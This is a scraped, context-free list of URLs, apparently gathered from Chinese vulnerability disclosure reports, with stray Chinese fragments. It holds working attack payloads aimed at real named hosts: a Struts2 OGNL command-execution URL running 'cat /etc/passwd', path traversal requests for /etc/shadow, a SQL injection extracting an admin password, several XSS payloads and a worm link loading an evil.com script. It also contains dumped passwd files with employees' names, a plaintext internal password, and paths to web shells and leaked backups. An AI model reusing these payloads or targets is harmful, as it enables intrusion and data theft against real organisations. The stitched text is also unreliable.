http://conference.hitb.org/hitbsecconf2012ams/materials/D1T1%20-%20Roberto%20Suggi%20and%20Scott%20Bell%20-%20Browser%20Bug%20Hunting%20in%202012.pdf http://vdisk.weibo.com/s/z1id0otCRMVPt http://127.0.0.1/m.xml,m.xml的内容为: xmlns:content="http://purl.org/rss/1.0/modules/content/ xmlns:wfw="http://wellformedweb.org/CommentAPI/ http://xgb.pku.edu.cn/home/homePicInfo.action http://myhome.bjtu.edu.cn/user/getArticle.action http://acm.bjtu.edu.cn/vjudge/contest/checkAuthorizeStatus.action http://kjc.njtu.edu.cn/listFrontUserFiles.action http://jjh.ustb.edu.cn/XiaoYou/manage/viewArticles.action http://cjdyz.bnuz.edu.cn/zmyz.action http://www.swxxf.sdu.edu.cn/randCode.action http://ivipc.uestc.edu.cn/module/news/read.action http://gms.uestc.edu.cn/gms_sso/rand.action http://msdn.microsoft.com/en-us/library/ms682425.aspx http://61.178.83.84:8083/showContent.action http://202.100.20.66/ http://msdn.microsoft.com/en-us/library/ms682425.aspx http://msdn.microsoft.com/en-us/library/ms682425.aspx http://123.125.89.27:8080/secure/Dashboard.jspa,注册的话没有限制,进入后可随意查看bug信息。 http://www.x6game.cn http://www.x6game.cn/news_cont.php?id=125 http://dk.x6game.cn/jsp/details.jsp?id=2 http://220.191.211.197:8068/wwsb/qjdh.action www.yidong.com.cn/bbs.asp www.yidong.com.cn/1.asp www.yidong.com.cn/test.txt http://112.4.133.85:299/sncn http://121.199.5.170 http://115.236.102.90/bin.rar http://zone.wooyun.org/content/1149 http://125.70.227.197:8666/SL/slProjectMainPage.aspx http://mail.spc.com.cn/ http://mail.spc.com.cn/test.txt http://www.gsjzsc.com.cn/ http://www.gsjzsc.com.cn/test.txt http://wap.cytxl.com.cn/logoutAction.action http://wap.cytxl.com.cn/showpageContactlistAction.action?resp_type=wap2&sid=FC2CE1&contactUserId=1000001 http://app.finance.ifeng.com/fund/jjjz_kfjj.php?type=0&oper_codei=1102 ftp://121.199.15.205/ ftp://121.199.15.205/yinglegou_IC3PB5/yinglegou_IC3PB5/ http://121.199.15.205/manage/ ftp://218.28.178.238 http://218.28.178.238/ http://61.178.48.40/ http://61.178.48.40/test.txt http://110.90.115.45/ http://110.90.115.45/test.txt http://jyxx.ah.sgcc.com.cn/login.aspx?ReturnUrl=%2fweb%2findex.aspx http://jyxx.ah.sgcc.com.cn/web/file/ http://jyxx.ah.sgcc.com.cn/web/file/fdqjyqk/Book1.xls http://jyxx.ah.sgcc.com.cn/web/file/jyjhwcqk/Book5%EF%BC%881%E6%9C%8831%E6%97%A5%EF%BC%89.xls http://www.ikuai8.com/helplist.php?id=3 http://211.103.[马赛克]:808/IPTrend http://faq.xiaomi.cn/ http://www.sdnpc.com/sdnpc/jeecms/ArtiSearch.do url:http://bbs.auto.sina.com.cn http://www.cafs.ac.cn/page/cafs/JianBao/Manager/index.asp http://im.t5y.cn:8080/twy/logout.action http://www.ncmtr.com/news.php?typeid=3 http://211.153.73.190/loginAction.do http://211.153.73.190/admin.html https://211.151.146.45:443/ site:7daysinn.cn filetype:htm http://mt.7daysinn.cn/DBQuery/Notice.htm)隐约泄漏出来的信息 dk.7daysinn.cn/About.htm)”的东西,打开之后可以很惊奇的发现有个修改密码的按钮 http://dk.7daysinn.cn/api/API.asmx http://www.dianping.com/member/jsonp/followUser?memberId=xxxxxx http://www.dianping.com/ajax/member/userTagOperator?oldUserTag=&newUserTag=0-天气不错-2 http://www.ikuai8.com/support_list.php http://www.ikuai8.com/helpcon.php?id=1'--&t=3 http://www.ikuai8.com/helplist.php?id=%5c http://www.ikuai8.com/more_list.php?keyword=1%27%22&type=1 http://tieba.youxi.baomihua.com/TieZiDetail.aspx?PostsID=379&TieBaID=1201 https://218.26.181.12:8080/cgi/maincgi.cgi?Url=Command&Action= https://218.26.181.12:8080/cgi/maincgi.cgi?Url=CommandResult http://gtj.boluo.gov.cn/ http://gtj.boluo.gov.cn/test.txt http://x.x.40.6/sdcms/admin/sd_admin.asp?act=adddb http://team.07073.com/ http://team.07073.com/wp-login.php http://drops.wooyun.org/papers/548 http://tea504.sinaapp.com/demo.html http://tea504.sinaapp.com/android/poc1.html http://www.hbda.gov.cn/news.do?method=downloadFile&fileName=../../../WEB-INF/web.xml http://www.ebuick.com.cn/beijing/price/price/0/290/1.html http://50.56.33.56/blog/?p=314 http://drops.wooyun.org/papers/548 http://www.fmi.com.cn/index.php/MgrUnity/detail/tid/7394/cid/3/rid/2/ http://61.178.48.15/ http://61.178.48.15/test.txt http://www.ahmcsj.gov.cn/ahmcsj.zip http://61.178.59.134/ http://61.178.59.134/BaseFlatPage/FlatSysManage/modemanage/MokuaiTree.aspx http://61.178.59.134/BaseFlatPage/FlatSysManage/modemanage/mode.aspx http://expert.womai.com/wp-login.php http://expert.womai.com/wp-login.php http://freshman.zjicm.edu.cn/yxxt/web/zzfw_index.do http://218.58.156.220:8002/yxxt/web/zzfw_index.do http://222.43.71.134:8020/yxxt/web/zzfw_index.do http://xg.glut.edu.cn:8080/yxxt/web/zzfw_index.do http://yxxt.yngsxy.net:8081/yxxt/web/zzfw_index.do http://yx.gdsdxy.cn/yxxt/web/zzfw_index.do http://yx.heuet.edu.cn/yxxt/web/zzfw_index.do http://60.191.79.168:8090/yxxt/web/zzfw_index.do http://www.nbsj.gov.cn/nbsj.rar http://www.ycssjj.gov.cn/web.rar http://www.cxsjj.gov.cn/1.rar http://www.dsxsjj.com/www.zip com.shangdu.com/Product.aspx?productid=100000 com.shangdu.com/Product.aspx?productid=100000'单引号,错误出来。 http://pay.pomoho.com/pay29293/throwloglist.aspx?userid=53260241&gameid=&areaid= http://218.26.22.3:8090/sxkh/indexAction.do http://about.jike.com/conf/web.xml http://about.jike.com/conf/server.xml http://about.jike.com/conf/tomcat-users.xml http://s13.mogujie.cn/b7/pic/130904/y61xb_kqyxcn2ekfbfqtdwgfjeg5sckzsew_20x20.jpg.php;aa_960x400.php;aa http://www.yimidai.com/沦陷, http://www.yimidai.com/jiushao.asp http://yimidai.com/plus/mytag_js.php?aid=9090 http://www.yimidai.com/bbs/ http://www.tchjbh.gov.cn/news_display.php?id=148 http://www.ykxs.gov.cn/jg_view.php?id=141 position:absolute;width:100%;height:300%;background-color vertical-align:top http://www.whmzzj.gov.cn:8080/index.do http://jifen.womai.com/share.php?activity=6&code=13055364&mid=0 baozoumanhua.com/articles/4573284/dn VERSION:1.2.2 http://my.taobao.com/ http://202.108.8.98/search.jsp?gaojieshow=1&lableId=95821 http://adminf.dixintong.com/login1.aspx http://sale.dixintong.com/ajax/getstore.ashx?province= http://116.228.223.212:7001/tel/telpay/TelPay/forTelPay.do?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://218.65.88.119:8899/xygsfind/view/view.action http://123.196.123.15/ www.lyqyj.gov.cn ftp://www.lyqyj.gov.cn http://zone.wooyun.org/content/6463 http://zone.wooyun.org/index.php?do=edit&act=delcomment&id=【commentLi http://125.39.185.229:8000/login.bf root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mike:x:10002:10002:Liu Xiaofeng:/home/mike:/bin/bash yutaka:x:10001:10001:Shi Yu:/home/yutaka:/bin/bash dingqi:x:10094:10094:dingqi:/home/dingqi:/bin/bash wangbisheng:x:20028:20028:wangbisheng:/home/wangbisheng:/bin/bash muran:x:30123:30123:muran:/home/muran:/bin/bash tzw:x:30136:30136:tianzhiwei:/home/tzw:/bin/bash wangshiqi:x:30137:30137:wangshiqi:/home/wangshiqi:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash apache:x:48:48:Apache:/var/www:/sbin/nologin www:x:30138:30138::/home/www:/bin/bash rsync:x:501:501:for transfer:/home/rsync:/bin/bash taifuyu:x:10017:10017:Tai Fuyu:/home/taifuyu:/bin/bash ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false nagios:x:30139:30139::/home/nagios:/bin/bash chenwenlong:x:30127:30127:chenwenlong:/home/chenwenlong:/bin/bash xiaojun:x:10033:10033:Tong Xiaojun:/home/xiaojun:/bin/bash yejun:x:30277:30277:yejun:/home/yejun:/bin/bash liuxiao:x:30130:30130:liuxiao:/home/liuxiao:/bin/bash zhangpei:x:30281:30281:zhangpei:/home/zhangpei:/bin/bash chenliang:x:30142:30142:chenliang:/home/chenliang:/bin/bash http://tw.xiaomi.com域名) http://tw.xiaomi.com/accessories/all?adapt=&page=1 http://app2.gzstats.gov.cn/auth/login.action http://219.139.130.103:8080/login.action http://yw.baoku.com.cn/login.aspx mailto:fuckyou@crazy.com?subject=HTML&body=hello display:none http://222.180.11.74:8087/common/common_info.action http://222.180.11.74:8087/Silic.jsp http://www.henancatv.com:8080/guestAction!view.action http://www.datangwealth.com/front/show-product!show.action www.gdcsgj.com/ReadArt.asp?ArtID=18801 http://music.163.com/api/msg/private/send?type=text&msg=尼玛这是要逆天啊,www.evil.com/evil.js&userIds=忘不了啊&time=-1 www.evil.com/evil.js”为包含worm的恶意代码 http://220.249.194.22/common/common_info.action?wid=201110151602351136&menu=3 http://220.249.194.22/Silic.jsp http://mchina.cn/query/category2.jsp?dir=%2Fvar%2Fspool%2Fabrt-upload http://www.cnddr.com/eBusiness/GB/product_detail.asp?catalogid=3&productid=26 http://www.its-standards.cn/ http://www.its-standards.cn/logtest.txt http://wap.hexin.cn http://wap.hexin.cn/dlxhtml/download.php?bid=4528&bname=%E9%80%9A%E7%94%A8%E5%8C%BA&fn=../../../../../../../../../../etc/shadow&mid=70&mname=iPad http://wap.hexin.cn/dlxhtml/download.php?bid=4528&bname=%E9%80%9A%E7%94%A8%E5%8C%BA&fn=../../../../../../../../../../etc/shadow&mid=70&mname=iPad root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ais:x:39:39:openais Framework:/:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin luci:x:100:101::/var/lib/luci:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin ricci:x:101:103:ricci user:/var/lib/ricci:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:102:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin update:x:505:506::/usr/local/apache/htdocs/waphtml:/bin/bash http://www.lysggb.gov.cn/common/common_info.action?design=17&wid=201106151411081008 http://www.lysggb.gov.cn/Silic.jsp http://1.207.242.13/indexAction.action http://1.207.242.13/Silic.jsp http://www.jungong.com.cn/controls/getstdtotable.ashx?cname=1 http://drops.wooyun.org/papers/548 http://lucky.anquanbao.com/app.htm http://www.lucky-bee.com/XsBbsAction!searchshopTypes.action http://www.lucky-bee.com/XsBbsAction!serachSelldatas.action http://www.lucky-bee.com/M4.txt http://113.204.164.234:8086/ http://www.cdss.gov.cn/manage/ http://60.216.97.249:9090/eduOnline/novalidateAction/downloadinfo.action http://218.94.1.82/biology/rss.action lp:/bin/false invscout:/usr/bin/ksh user:/usr/sbin/snapp:/usr/sbin/snappd ipsec:/usr/bin/ksh user:/var/spool/uucppublic:/usr/sbin/uucp/uucico pconsole:/usr/bin/ksh esa:/usr/bin/ksh oracle:/usr/bin/ksh http://www.sass.cn/skyc.asp?csmallclassid=162-2%2b4-2-2%2b99&csmallclassname=%CF%C2%D4%D8%D7%A8%C7%F8%A3%A8%CB%B6%CA%BF%A3%A9&name=yjs http://124.115.170.189/desktop/login/login.action http://124.207.21.90 http://124.207.21.90/logtest.txt http://www.w3.org/TR/html4/loose.dtd http://www.welinker.com/ca9768bd08c373665fbcc88021f088b6 http://223.202.15.179 https://58.56.128.8/tcs/ https://58.56.128.8/tcs/Frm_GetPassWord.aspx http://123.234.41.51:7001/signature/login.action http://www.blueyee.com/ http://www.chinalulutong.com/admin/admin!login.action http://www.hdeec.com/admin/admin!login.action http://expert.ccidnet.com/expert/list_expert.php?did=60 http://expert.ccidnet.com/expert/list_expert.php?did=60 http://event.pchome.net/admin/ http://改成了//,证明可以成功执行,这里要感谢@VIP http://bbs.51taoshi.com http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://school.51taoshi.com/school/index/courselist.action http://school.51taoshi.com/loginGoto.action http://school.51taoshi.com/school/index/course_Info.action http://school.51taoshi.com/M4.txt http://cglx.51taoshi.com/admin/ http://shanghai.koofang.com/rent/UpdateTime.php?id=1000133025 http://shanghai.koofang.com/login/register.php http://tiku.51taoshi.com http://tiku.51taoshi.com/?phpinfo=1 http://tiku.51taoshi.com/nmcHDtouch/index.php/Login/adminlogin http://bj.wo.com.cn/HD/llmm.action漏洞地址 http://218.203.214.57:8080/ADC20/sys/Logout.action http://wiki.koofang.com/ http://bbs.oupeng.com/home.php?mod=space&username=admin的信息,发现她的名字有点特别,于是,我就利用大数据的能力,获得了Csineneo用户的密码信息等 http://is.gd/HZZ6d7 http://www.e-trans.com.cn:8090/etrans4022/login.action http://vip.book.sohu.com/user/的个人信息修改处 http://gm.mccq.mingchao.com/module/index.php http://gm.mccq.mingchao.com/module/.svn/entries http://59.151.49.39:7080/login/login.do,存在Strust2命令执行漏洞。 http://www.xjbt.lss.gov.cn/database.rar http://www.511860.com/autologin/login!index.action http://2007.cepee.com/news/text.php?NewsId=70194&FT_Id=% http://113.140.70.184:4016/forUI/default.aspx http://113.140.70.184:4016/forui/corpinfo/corpbaseinfo.aspx?CorpCode=1 http://igrowing.ichzh.com/e/member/gz/news.php?id=294 http://www.bjsupervision.gov.cn:8080/caphtjcj/reportForm/viewdetail.action?reportForm.id=0100261 http://xtv.coocaatv.com/.然后对其进行社工扫描后台无果,查看登录页面的,JS文件,发现路径 www.trgov.gov.cn/trgov.rar www.nnghj.gov.cn/web.rar www.hnfzb.gov.cn/hnfzb.gov.cn.zip www.hbfgj.gov.cn/www.zip www.zzfda.gov.cn/zzfda.rar www.taian.gov.cn/web.rar www.ynyz.gov.cn/www.rar www.sctcm.gov.cn/sctcm.rar www.hnhq.gov.cn/wwwroot.zip www.hzyg.gov.cn/hzyg.rar www.siyang.gov.cn/web.zip www.lyq.gov.cn/lyq.rar http://www.whcc.com.cn/root.rar http://gosmstheme.goforandroid.com/GoThemeWeb/login/login!login.action http://www.cudatec.com/login.action http://www.tcom.gov.cn/web.rar http://www.gnsw.gov.cn/www.gnsw.gov.cn.zip http://www.wnsw.gov.cn/wnsw.rar http://www.syftec.gov.cn/syftec.rar http://113.200.200.46/ http://113.200.200.46/shell.asp http://info.bd.gov.cn/bd.rar http://sh.118100.cn/park/login/waplogin!deviceidbypet.action http://card.hn165.com/index.action http://t.iqiyi.com/home http://www.wncoop.gov.cn/web.rar http://www.wlcoop.com/wlcoop.rar http://www.cqta.gov.cn/wwwroot.rar http://top100.blogchina.com/home.action http://221.192.132.142:9998/admin/Cjy_load.do http://ideaclub.lenovo.com.cn/club/index.php?m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b http://www.zkxf.com.cn/zkxf.rar http://www.bdxfj.gov.cn/bdxfj.rar www.dlink.com.cn http://www.dlink.com.cn/ScriptResource.axd?d=YjExFdnbDi8NGnxW49G-oOGkbHQDmoFIG-r2GywFxfMAAAAAAAAAAAAAAAAAAAAA0 http://forum.fengyunzhibo.com:9001/robots.txt/1.php http://dlkj.edufe.cn/initLogin.action http://training.szkj.edufe.cn/initLogin.action http://csadmin.edufe.cn//login.action http://zjkj.edufe.cn/initLogin.action inurl:initLogin.action height:400px;position:relative jboss-4.0.5.GA/server/default/./deploy/xxxx.war http://www.eq-igl.ac.cn/web.rar http://serach.17k.com http://adsales.tudou.com/ http://www.nicpbp.org.cn/dataquery/jdyw/queryproreq.action http://localhost:1104/ajax/content.aspx?oper=ajaxDownCount&cType=paper&id=1 http://115.236.102.125 http://115.236.102.125:8082的弱口令 http://www.uhui.cn/groupDetail.action www.xxxx.com/weblogin/index.aspx?ajax=true http://files.cnblogs.com/zpino/v5shop.rar http://wydrops-wordpress.stor.sinaapp.com/uploads/2013/09/v5shop.rar http://www.lslushan.com/web/getWebNewsList.action http://localhost/myfile/用户名/1.ashx http://wpa.qq.com/msgrd?v=3&uin= http://wpa.qq.com/pa?p=2:想攻击的QQ号:51 http://shop.lenovo.com/us/en/portals/communications?ipromoID=emlsu1a http://bbs.lenovo.net/data/download/14067/tv.php._addons_ http://bbs.lenovo.net/install/data/ http://ams.lenovo.com.cn:81/files/ http://ams.lenovo.com.cn:81/db/ http://support4.lenovo.com.cn:8080/downloads/ http://bbs.lenovo.net/phpinfo.php http://ideaphone.lenovo.com.cn/test.php http://219.142.122.128/ewebeditor/admin/ http://ideaclub.lenovo.com.cn/forum/forum.php?mod=viewthread&tid=239&pid=1961&page=12&extra=#pid1961 http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://emapp.cn/tb/taobao/appstore/toDownload.action http://passport.weiphone.com/?r=user/lostPwdRequest2 http://192.168.1.106/admin/Category_GetSearch.aspx?key= http://kf.mopo.com/web/faqWebAction!noticeView.action http://forum.freebuf.com是FreeBuf之前的论坛,现在关闭了,用的discuz!,用户中心是UCenter http://forum.freebuf.com/uc_server/admin.php http://www.tallk.cn/feedbackWeb/list.action http://www.sdds.zjb.gov.cn/ http://www.sdds.zjb.gov.cn/index.php?m=search&c=index&a=public_get_suggest_keyword&url=test&q=../../phpsso_server/caches/configs/database.php http://www.99inn.cc/StoreInfoDetails.aspx?StoreID=021024%27%20and%20%28select%20top%201%20pwd%20from%20tb_users%20where%20username=%27admin%27%20%29=1--+ http://www.99inn.cc/AdminLogin.aspx http://login.tudou.com/reg.do?act=isRegisteredNickname4Reg&callback=wooyun http://tjpt.my.tudou.com/tjpt/recommend?pcode=10000100&callback=wooyun http://marketing.tudou.com/tianlei/shumenol2/upload.php http://www.ex-silver.com/huiyi/2.php?channel_id=47&news_id=21 http://www.v5shop.com.cn/case/20120609/8891/index.php http://www.gjxwsbs.com/admin/ http://vip.book.sohu.com/user/dashang/dashang_wap.php?book_id=131101 http://www.ipmall.org.cn/phpmyadmin/ http://forum.kugou.com/showtopic-326440.aspx http://wapchat.tom.com/ http://wapchat.tom.com/index.html http://wapchat.tom.com/info.txt http://wapchat.tom.com/manage/ http://www.jhkkk.com/admin/main.html http://192.168.1.106/Admin/action.ashx http://ititit-upload.stor.sinaapp.com/tmp.zip qq.com/123456 http://s.haier.com/ http://localhost:8080/km100survey/faces/public/re_email_password.jsp?email=wooyuntest1@163.com http://192.168.1.106/admin/pinglun.asp?id=71 https://passport.17173.com/ http://125.71.232.30/login http://bankcomm.tudou.com/bankcomm/user.getDigNum.do?r=0.4318580571562052 http://chinatelecom.95081.com/cms/photo/photoContent!getPhotoContent.action http://www.gjks.com.cn/ http://www.conghua.zp300.cn/sywd/sort.php?ID=1 http://a.xcar.com.cn/preference/index.php?action=Current&method=apply&cid=475&ccid=2016 http://www.exiaoke.com/order/buy!quickbuy.action http://219.147.55.173:8010/login!loginInput.action http://www.156.cn/loginUser!shenqu.action www.hebcrj.com/xquery/xquery-search.action http://www.hebcrj.com/Silic.jsp http://cx.ytjj.gov.cn:9081/ytjjvio/vehvio.action http://cx.ytjj.gov.cn:9081/ytjjvio/Silic.jsp http://221.232.141.235:8082/regonline/qzsp.jsp http://221.232.141.235:8082/ICSP/page/ywjdcx_init.action http://221.232.141.235:8082/ICSP/Silic.jsp http://www.nmds.gov.cn:9999/invoice/invoice!index.action http://www.nmds.gov.cn:9999/Silic.jsp http://wapchat.tom.com/manage/ http://www.jltgw.com/pcsEdelr!find.action http://www.jltgw.com/Silic.jsp http://hk.gtja.com/zqscInfo/FundList.aspx?NodeID=739 http://webmail.xinnet.com http://webmail.xinnet.com/app/mailset/mailSign/operate?method=addMailSignature&sigId=&isHtml=false&sigSubject=%E9%BB%98%E8%AE%A4%E7%AD%BE%E5%90%8D&defaultSig=true&signatureContent=签名内容 http://xssplatform.xss.com/xss?1378700262 http://webmail.xinnet.com/app/mailset/mailSign/set http://ziyuan.51taoshi.com/fore/myzycenter/showMyzy.action http://ziyuan.51taoshi.com/fore/zycenter/viewZy.action?zid=201309061907070015 http://www.maxthon.cn/admin/admincp.php www.maxthon.cn http://118.122.113.71:8780/login.do http://www.18touch.com ip:192.168.100.6 pwd:E%vdGd~2 http://www.scrftb.gov.cn/searchlist.aspx?page=2&s=1 http://www.scrftb.gov.cn/searchlist.aspx?page=2&s=1'%22” http://maishihui.womai.com/ http://expert.womai.com/maifood/wp-login.php http://service.zlqh.com/cn/web/user_login.aspx http://service.zlqh.com/cn/ http://service.zlqh.com/cn/ajax/getdaylist.aspx http://606app.cofco.com/app/pages/login.action http://118.145.26.216 http://www.xxs8.com/book_end_com.php?book_id=165350%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E http://code.taobao.org,就是它了,登录什么的最烦人。 http://code.taobao.org/svn,5364个子目录,资源库啊!!!!!!!! VERSION:1.2.2 http://cglx.51taoshi.com/content.php?id=262 http://www.cofcohg.com/?m=Index&a=about_show&id=11 http://www.cofcorice.com/admin/ http://123.234.41.43/web.rar http://recite2.super.yeshj.com/superadmin/statistics.aspx http://hz.cofcopack.com:8080/Jobs2.aspx?Cid=10 http://hz.cofcopack.com:8080/admin/adminlogin.aspx http://www.yhachina.com/topic.php?channelID=1&topicID=203 http://club.guoao.com.cn/vipuser/tologin.action http://www.beta.ulechina.tom.com/ http://www.beta.ulechina.tom.com/yummi_beta/.ssh/authorized_keys http://duokoo.baidu.com/novel/?R=493&v=2&pageid=E70dlhtt&bck=1386&jump_p_id=M5ht79md&logout=1&uid=4850E0C9145E3CB2EFC9AAE552E0F3F8&netFlag=cmnet&dkfrc=1&usid=12B6E38CACEE17F2B7022F8938B94F91&rdtp=0 http://www.igoodcar.cn/car/news!show.action http://bank.ecitic.com/personal/ http://175.6.0.122/index.php?m=main&f=login pinglun.07073.com/manage.php http://www.wengyuan.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://nokia-imaging.tom.com.cn/manage/index.jsp http://www.cdjustice.chengdu.gov.cn/justice_sfjd/quire/quiresallist.action http://124.160.11.208:8080/prm/Login!input.action www.cofco-trust.com http://www.cofco-trust.com/templates/T_yestem_column/index.aspx?nodeid=%22%22 http://www.cofco-trust.com/console/login.aspx http://space.51taoshi.com/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://emkei.cz/ http://e-learning.lenovo.com.cn//css/admin/.svn/entries http://访问源进行了限制,而对https的配置并未生效,导致仍然存在缺陷。 https://changba.com/.svn/entries https://changba.com https://changba.com http://www.kulv.com/repos/kulv/KTV/www http://www.kulv.com/repos/kulv http://developer.meizu.com/faq/faq_addgetting.jsp# http://202.108.15.61/Orion/Login.aspx http://xjd.tcl.com/showclick.asp?guid=20130422184740176 http://news.17173.com/zt/2013/kxj/index.shtml www.3gcare.cn/ http://www.365fanyi.com http://forums.pku.edu.cn:80/conference_blue/content.php?hy_id=-1%20or%2041%3d39&id=34 http://forums.pku.edu.cn/admin/admin_login.php http://school.51taoshi.com/M4sk.txt http://506srm.cofco.com/custom http://km.cofco.com/user//user/login.php?UserName=&Password=&action=Reuse&isResult=1 http://media.cofco.com/uploadfiles/文件泄露 http://www.js11183.com/Profile.jsp?id=01 http://site.vegaga.com/user/toLoginRegister.action http://site.vegaga.com/user/toLoginRegister.action http://www.fynews.net/Data/data.rar http://www.tcl.com/.svn/entries http://shop.tcl.com/.svn/entries http://shop.tcl.com/test2.php http://shop.tcl.com/memcache.php http://mail.21cn.com/ http://58.60.230.1:81/ http://58.60.230.1:81/config/conn.asp http://58.60.230.1:81/config/ http://58.60.230.1:81/ch/dbmanager/login.aspx http://58.60.230.1:81/ch/dbmanager/ http://58.60.230.1:81/print/ http://www.maipu.cn/news.aspx?key=mico%'+and+1=1+and+'%'= http://www.maipu.cn/news.aspx?key=mico%'+and+1=2+and+'%'= inurl:doc/page/login.asp http://jtjt.pukou.gov.cn/ http://ebidding.lenovo.com.cn/backoffice/getPass http://sqlmap.org http://ebidding.lenovo.com.cn:80/backoffice/getPass.aspx http://open.youku.com/assets/lib/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// http://t.youc.com/ http://www.xinfeng.gov.cn/1.txt http://newsletter.zhongliangwomai.com:8081/smartedm/welcome.do http://www.65601111.com/news!naviNewsDetail.action?id=19 http://58.60.230.24/ http://58.60.230.24/dianzi.aspx?id=34 http://58.60.230.24/admin/1.aspx http://www.topfreeweb.net/CompanyInformation/companyInformationAction_showdetails.action?id=7 http://110.75.66.103/carnival/history/schedule/2013/detail/main/261 http://110.75.66.103:80/carnival/history/schedule/2013/detail/main/261 http://www2.easou.com:8080/views/login.jsp www.wooyun.org/bugs/wooyun-2010-011192 www.wooyun.org/bugs/wooyun-2010-011192(一哥说得对,反射型xss的危害可大可小) wpa.qq.com/msgrd?V=1&Uin=【QQ号】&Site=ioshenmue&Menu=yes原理是访问这个地址然后鼠标模拟点击“加为好友”、“下一步”,鼠标录制可以简单完成这项工作。 http://115.182.51.86/wenba/my_answer.php?status=1 http://www.ihangjing.com/admin/upfile/Upload.html?Links只在前端过滤。后台没有做过滤处理。 svn://svn.corp.gfan.com/home/projects http://117.79.[马赛克]:8080 http://www.tfle.thtf.com.cn/news-ultimate.php?id=92 http://lt.imobile.com.cn/uc_server/admin.php http://www.00544.com/.svn/text-base/config.inc.php.svn-base http://www.00544.com/info.php http://news.7k7k.com/ceshi/ http://www.tuanlego.com/User-login.html www.tuanlego.com http://www.tuanlego.com http://msla.hz.letv.com/servlet/mslaInfo?id=1 